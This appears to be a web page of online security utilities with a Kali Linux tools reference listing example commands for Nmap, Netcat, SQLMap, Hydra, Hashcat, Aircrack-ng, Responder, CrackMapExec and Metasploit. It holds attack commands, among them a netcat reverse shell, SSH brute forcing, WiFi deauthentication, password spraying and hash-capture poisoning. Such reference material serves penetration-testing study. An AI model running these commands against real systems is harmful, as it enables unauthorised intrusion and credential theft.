SnowBytes.in

SYSTEM: ONLINE USER: ANONYMOUS SERVER: LOCAL 00:00:00

// BASE64_ENCODER_DECODER

// BASE32_ENCODER_DECODER

// MD5_HASHER

// SHA1_HASHER

// SHA256_HASHER

// SHA512_HASHER

// URL_ENCODER_DECODER

// HEX_CONVERTER

// VIRUSTOTAL_FILE_SCANNER

// VIRUSTOTAL_URL_SCANNER

// VIRUSTOTAL_HASH_LOOKUP

// VIRUSTOTAL_IP/DOMAIN_LOOKUP

// PACKET_ANALYZER

LIVE PACKET CAPTURE

Packets: 0 Bytes: 0 Rate: 0 pkt/s

// WEB_TERMINAL

Safe simulated environment - commands are emulated, not executed
⚠️ WARNING: SSH and Local modes execute real commands. Use with caution!

// KALI_LINUX_TOOLS_REFERENCE

Browse and learn commands for popular Kali Linux security tools. Click any tool to see its commands, then use "TRY IN TERMINAL" to test them.

Network Analysis

Nmap
Network scanner for discovering hosts and services
10 commands
Wireshark/tshark
Network protocol analyzer for traffic capture
5 commands
Netcat
TCP/UDP Swiss Army Knife for networking
5 commands
Responder
LLMNR/NBT-NS/MDNS poisoner for hash capture
5 commands

Web Application Testing

Burp Suite
Web security testing platform with proxy
3 commands
Nikto
Web server vulnerability scanner
5 commands
SQLMap
SQL injection detection and exploitation
5 commands
Wfuzz
Web application fuzzer for brute-forcing
5 commands

Directory/DNS Enumeration

Gobuster
Fast directory/DNS brute-forcer in Go
5 commands
DIRB
Web content scanner for hidden files
5 commands
Whois
Domain and IP registration lookup
3 commands
Dig
DNS lookup utility
6 commands

Password Attacks

Hydra
Fast online password cracking tool
5 commands
John the Ripper
CPU-based password hash cracker
5 commands
Hashcat
GPU-accelerated password recovery
6 commands

Wireless Attacks

Aircrack-ng
WiFi security auditing suite
6 commands

SMB/Active Directory

Enum4linux
Windows/Samba enumeration tool
5 commands
SMBclient
SMB/CIFS file share client
5 commands
CrackMapExec
AD post-exploitation swiss army knife
5 commands

Exploitation

Metasploit
Penetration testing framework
6 commands

// NMAP

Network Analysis

Network Mapper

Nmap is a free and open-source network scanner used to discover hosts and services on a computer network.

apt install nmap

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
nmap <target>Basic scan - discovers open portsnmap 192.168.1.1
nmap -sS <target>TCP SYN scan (stealth)nmap -sS 192.168.1.1
nmap -sV <target>Service version detectionnmap -sV 192.168.1.1
nmap -O <target>OS detectionnmap -O 192.168.1.1
nmap -A <target>Aggressive scan (OS, version, scripts)nmap -A 192.168.1.1
nmap -p <ports> <target>Scan specific portsnmap -p 22,80,443 192.168.1.1
nmap -p- <target>Scan all 65535 portsnmap -p- 192.168.1.1
nmap -sU <target>UDP scannmap -sU 192.168.1.1
nmap -sn <network>Ping sweep (host discovery)nmap -sn 192.168.1.0/24
nmap --script <script> <target>Run NSE scriptsnmap --script vuln 192.168.1.1

// WIRESHARK

Network Analysis

Network Protocol Analyzer

Wireshark captures and analyzes network traffic. tshark is its command-line equivalent.

apt install wireshark tshark

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
tshark -i <interface>Capture on interfacetshark -i eth0
tshark -i <interface> -w <file>Capture and save to filetshark -i eth0 -w capture.pcap
tshark -r <file>Read from pcap filetshark -r capture.pcap
tshark -DList available interfacestshark -D
tshark -i <interface> -c <count>Capture specific number of packetstshark -i eth0 -c 100

// NETCAT

Network Analysis

TCP/UDP Swiss Army Knife

Netcat (nc) is a versatile networking utility for reading/writing data across network connections.

apt install netcat-openbsd

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
nc <host> <port>Connect to a host and portnc 192.168.1.1 80
nc -l -p <port>Listen on a portnc -l -p 4444
nc -lvp <port>Listen verboselync -lvp 4444
nc -z <host> <port-range>Port scanningnc -z 192.168.1.1 20-100
nc -e /bin/bash <host> <port>Reverse shellnc -e /bin/bash 10.0.0.1 4444

// NIKTO

Vulnerability Analysis

Web Server Scanner

Nikto is an open-source web server scanner that tests for dangerous files and security issues.

apt install nikto

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
nikto -h <host>Basic scannikto -h http://192.168.1.1
nikto -h <host> -p <port>Scan specific portnikto -h 192.168.1.1 -p 8080
nikto -h <host> -sslForce SSL modenikto -h 192.168.1.1 -ssl
nikto -h <host> -o <file>Output to filenikto -h 192.168.1.1 -o report.txt
nikto -updateUpdate pluginsnikto -update

// SQLMAP

Vulnerability Analysis

SQL Injection Tool

SQLMap automates the detection and exploitation of SQL injection flaws.

apt install sqlmap

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
sqlmap -u URLTest URL for SQL injectionsqlmap -u "http://site.com/page?id=1"
sqlmap -u URL --dbsEnumerate databasessqlmap -u URL --dbs
sqlmap -u URL -D db --tablesEnumerate tablessqlmap -u URL -D testdb --tables
sqlmap -u URL --batchNon-interactive modesqlmap -u URL --batch
sqlmap -r fileLoad request from filesqlmap -r request.txt

// HYDRA

Password Attacks

Login Cracker

Hydra is a fast online password cracking tool supporting numerous protocols.

apt install hydra

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
hydra -l user -P wordlist host sshSSH brute forcehydra -l admin -P wordlist.txt 192.168.1.1 ssh
hydra -L users -P wordlist host sshMultiple users SSHhydra -L users.txt -P pass.txt 192.168.1.1 ssh
hydra -l user -P wordlist ftp://hostFTP brute forcehydra -l admin -P wordlist.txt ftp://192.168.1.1
hydra -t threads ...Set parallel taskshydra -t 16 -l admin -P pass.txt 192.168.1.1 ssh
hydra -V ...Verbose outputhydra -V -l admin -P pass.txt 192.168.1.1 ssh

// JOHN

Password Attacks

Password Cracker

John the Ripper is a fast password cracker for detecting weak passwords.

apt install john

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
john hashfileCrack password hashesjohn hashes.txt
john --wordlist=file hashfileDictionary attackjohn --wordlist=rockyou.txt hashes.txt
john --format=type hashfileSpecify hash formatjohn --format=raw-md5 hashes.txt
john --show hashfileShow cracked passwordsjohn --show hashes.txt
john --list=formatsList supported formatsjohn --list=formats

// WHOIS

Information Gathering

Domain Information Lookup

Whois queries databases for domain and IP registration information.

apt install whois

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
whois domainDomain lookupwhois example.com
whois ipIP address lookupwhois 8.8.8.8
whois domain | grep "name server"Get name serverswhois example.com | grep "name server"

// DIG

Information Gathering

DNS Lookup Utility

Dig is a flexible tool for interrogating DNS name servers.

apt install dnsutils

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
dig domainBasic DNS lookupdig example.com
dig domain ANYQuery all record typesdig example.com ANY
dig domain MXQuery MX recordsdig example.com MX
dig @server domainQuery specific DNS serverdig @8.8.8.8 example.com
dig +short domainShort output (IP only)dig +short example.com
dig -x ipReverse DNS lookupdig -x 8.8.8.8

// METASPLOIT

Exploitation

Penetration Testing Framework

Metasploit Framework is a powerful penetration testing platform.

⚠️ Metasploit requires proper setup. Use msfdb init to initialize.
apt install metasploit-framework

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
msfconsoleStart Metasploit consolemsfconsole
search keywordSearch for exploitssearch type:exploit smb
use moduleSelect a moduleuse exploit/windows/smb/ms17_010_eternalblue
show optionsDisplay module optionsshow options
set option valueSet module optionset RHOSTS 192.168.1.1
exploitExecute the moduleexploit

// BURP_SUITE

Web Application Testing

Web Security Testing Platform

Burp Suite is the leading toolkit for web application security testing. It includes an intercepting proxy, web spider, scanner, intruder, repeater, and more. Essential for testing web apps for vulnerabilities like SQL injection, XSS, CSRF, and authentication flaws. The proxy intercepts all HTTP/HTTPS traffic between your browser and target applications.

💡 Community Edition is free. Professional has advanced features like automated scanning.
apt install burpsuite

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
burpsuiteLaunch Burp Suite GUIburpsuite
java -jar burpsuite.jarRun from JAR filejava -jar burpsuite_community.jar
Configure proxy: 127.0.0.1:8080Set browser proxy to Burpexport http_proxy=127.0.0.1:8080

// AIRCRACK-NG

Wireless Attacks

WiFi Security Auditing Suite

Aircrack-ng is a complete suite for assessing WiFi network security. It focuses on monitoring (packet capture), attacking (replay attacks, deauthentication), testing (checking WiFi cards and driver capabilities), and cracking (WEP and WPA/WPA2-PSK). It works with any WiFi card that supports raw monitoring mode.

⚠️ Only use on networks you own or have permission to test. Unauthorized access is illegal.
apt install aircrack-ng

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
airmon-ng start <interface>Enable monitor mode on wireless interfaceairmon-ng start wlan0
airodump-ng <interface>Capture packets and list nearby networksairodump-ng wlan0mon
airodump-ng -c <ch> --bssid <mac> -w <file> <iface>Target specific network and save captureairodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
aireplay-ng -0 <count> -a <bssid> <iface>Deauthentication attack to capture handshakeaireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
aircrack-ng -w <wordlist> <capture>Crack WPA/WPA2 with wordlistaircrack-ng -w rockyou.txt capture-01.cap
airmon-ng stop <interface>Disable monitor modeairmon-ng stop wlan0mon

// HASHCAT

Password Attacks

Advanced GPU Password Recovery

Hashcat is the world's fastest and most advanced password recovery utility, supporting 300+ hash types including MD5, SHA1, SHA256, bcrypt, NTLM, and more. It leverages GPU acceleration to crack passwords at incredible speeds. Supports multiple attack modes: dictionary, brute-force, combinator, rule-based, and mask attacks.

💡 GPU acceleration provides 10-100x faster cracking than CPU-only tools like John.
apt install hashcat

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
hashcat -m <type> <hash> <wordlist>Dictionary attack with hash typehashcat -m 0 hash.txt rockyou.txt
hashcat -m 0MD5 hash typehashcat -m 0 hash.txt wordlist.txt
hashcat -m 1000NTLM hash type (Windows)hashcat -m 1000 ntlm.txt rockyou.txt
hashcat -a 3 -m <type> <hash> ?a?a?a?aBrute-force with mask (4 chars)hashcat -a 3 -m 0 hash.txt ?a?a?a?a?a?a
hashcat --show <hash>Show cracked passwordshashcat --show hash.txt
hashcat -IShow available devices (GPUs)hashcat -I

// GOBUSTER

Web Enumeration

Directory/DNS/VHost Brute-Forcer

Gobuster is a fast directory/file, DNS subdomain, and virtual host brute-forcing tool written in Go. It's commonly used to discover hidden directories, files, and subdomains on web servers. Much faster than similar tools due to Go's concurrency. Supports multiple modes: dir (directories), dns (subdomains), vhost (virtual hosts), and s3 (AWS buckets).

💡 Use with SecLists wordlists for comprehensive enumeration.
apt install gobuster

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
gobuster dir -u <url> -w <wordlist>Directory brute-forcegobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u <url> -w <wl> -x php,htmlSearch for specific extensionsgobuster dir -u http://target.com -w wordlist.txt -x php,html,txt
gobuster dns -d <domain> -w <wordlist>DNS subdomain enumerationgobuster dns -d target.com -w subdomains.txt
gobuster vhost -u <url> -w <wordlist>Virtual host enumerationgobuster vhost -u http://target.com -w vhosts.txt
gobuster dir -u <url> -w <wl> -t 50Use 50 threads for faster scangobuster dir -u http://target.com -w wordlist.txt -t 50

// DIRB

Web Enumeration

Web Content Scanner

DIRB is a web content scanner that looks for existing (and hidden) web objects by launching a dictionary-based attack against a web server. It finds directories and files that may not be linked from the main website. Useful for finding admin panels, backup files, configuration files, and other sensitive content that developers may have left accessible.

apt install dirb

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
dirb <url>Basic scan with default wordlistdirb http://target.com
dirb <url> <wordlist>Scan with custom wordlistdirb http://target.com /usr/share/wordlists/dirb/big.txt
dirb <url> -X <extensions>Search for specific extensionsdirb http://target.com -X .php,.bak,.old
dirb <url> -o <output>Save results to filedirb http://target.com -o results.txt
dirb <url> -a <user-agent>Use custom User-Agentdirb http://target.com -a "Mozilla/5.0"

// WFUZZ

Web Fuzzing

Web Application Fuzzer

Wfuzz is a tool designed for brute-forcing web applications. It can be used to find resources not linked (directories, servlets, scripts), brute-force GET/POST parameters, brute-force forms (user/password), fuzz headers, and discover injection points. The FUZZ keyword is replaced with values from a wordlist.

💡 Use --hc 404 to hide 404 responses and reduce noise.
apt install wfuzz

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
wfuzz -c -w <wl> <url>/FUZZDirectory fuzzing with colorwfuzz -c -w wordlist.txt http://target.com/FUZZ
wfuzz -c -w <wl> --hc 404 <url>/FUZZHide 404 responseswfuzz -c -w wordlist.txt --hc 404 http://target.com/FUZZ
wfuzz -c -w <wl> -d "user=FUZZ" <url>POST parameter fuzzingwfuzz -c -w users.txt -d "username=FUZZ&password=admin" http://target.com/login
wfuzz -c -w <wl> -H "Host: FUZZ.target.com" <url>Virtual host fuzzingwfuzz -c -w subdomains.txt -H "Host: FUZZ.target.com" http://target.com
wfuzz -c -z range,1-100 <url>?id=FUZZFuzz with number rangewfuzz -c -z range,1-100 http://target.com/page?id=FUZZ

// ENUM4LINUX

SMB Enumeration

Windows/Samba Enumeration Tool

Enum4linux is a tool for enumerating information from Windows and Samba systems. It can gather usernames, group membership, shares, password policies, and OS information. Essential for Active Directory and Windows network penetration testing. Wraps commands from smbclient, rpcclient, net, and nmblookup.

💡 Use -a for full enumeration including users, shares, groups, and policies.
apt install enum4linux

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
enum4linux -a <ip>Full enumeration (all options)enum4linux -a 192.168.1.100
enum4linux -U <ip>Enumerate usersenum4linux -U 192.168.1.100
enum4linux -S <ip>Enumerate sharesenum4linux -S 192.168.1.100
enum4linux -G <ip>Enumerate groupsenum4linux -G 192.168.1.100
enum4linux -P <ip>Enumerate password policyenum4linux -P 192.168.1.100

// SMBCLIENT

SMB/CIFS

SMB/CIFS Client

SMBclient is a command-line tool for accessing SMB/CIFS resources on servers. Similar to an FTP client, it allows you to list shares, download/upload files, and interact with Windows file shares. Essential for testing Windows networks and accessing shared folders during penetration tests.

apt install smbclient

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
smbclient -L <ip>List available sharessmbclient -L 192.168.1.100
smbclient -L <ip> -NList shares with null sessionsmbclient -L 192.168.1.100 -N
smbclient //<ip>/<share>Connect to a sharesmbclient //192.168.1.100/shared
smbclient //<ip>/<share> -U <user>Connect with usernamesmbclient //192.168.1.100/shared -U admin
get <file>Download file (inside smbclient)get secret.txt

// CRACKMAPEXEC

Active Directory

Post-Exploitation & AD Tool

CrackMapExec (CME) is a swiss army knife for pentesting networks. It automates assessing the security of large Active Directory networks. Supports SMB, LDAP, MSSQL, SSH, and WinRM protocols. Can perform password spraying, command execution, credential dumping, and lateral movement. Essential for AD penetration testing.

💡 Green [+] means success, Red [-] means failed authentication.
apt install crackmapexec

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
crackmapexec smb <ip>SMB enumerationcrackmapexec smb 192.168.1.0/24
crackmapexec smb <ip> -u <user> -p <pass>Test credentialscrackmapexec smb 192.168.1.100 -u admin -p password123
crackmapexec smb <ip> -u <user> -p <pass> --sharesList shares with credscrackmapexec smb 192.168.1.100 -u admin -p pass --shares
crackmapexec smb <ip> -u users.txt -p pass.txtPassword sprayingcrackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt
crackmapexec smb <ip> -u <u> -p <p> -x <cmd>Execute commandcrackmapexec smb 192.168.1.100 -u admin -p pass -x "whoami"

// RESPONDER

LLMNR/NBT-NS Poisoning

Network Protocol Poisoner

Responder is a LLMNR, NBT-NS, and MDNS poisoner. When Windows machines fail to resolve hostnames via DNS, they fall back to LLMNR and NBT-NS. Responder responds to these queries, tricking machines into sending authentication hashes. These NTLMv2 hashes can then be cracked offline or relayed for access.

⚠️ This is an active attack - use only on authorized networks!
apt install responder

COMMANDS REFERENCE

COMMANDDESCRIPTIONEXAMPLEACTIONS
responder -I <interface>Start Responder on interfaceresponder -I eth0
responder -I <iface> -wrfEnable WPAD, fingerprintingresponder -I eth0 -wrf
responder -I <iface> -AAnalyze mode (no poisoning)responder -I eth0 -A
cat /usr/share/responder/logs/*.txtView captured hashescat /usr/share/responder/logs/Responder-Session.log
hashcat -m 5600 hash.txt wordlist.txtCrack NTLMv2 hashhashcat -m 5600 ntlmv2.txt rockyou.txt

// JWT_DECODER_ENCODER

VERIFY SIGNATURE (HS256)

// PASSWORD_SECRET_GENERATOR

// TIMESTAMP_CONVERTER

CURRENT UNIX TIMESTAMP: 0

UNIX → HUMAN DATE

HUMAN DATE → UNIX

// REMOTE_CONNECTION

DEFAULT SERVER

Enter IP address or full URL. Leave empty for local server.

SAVED SERVERS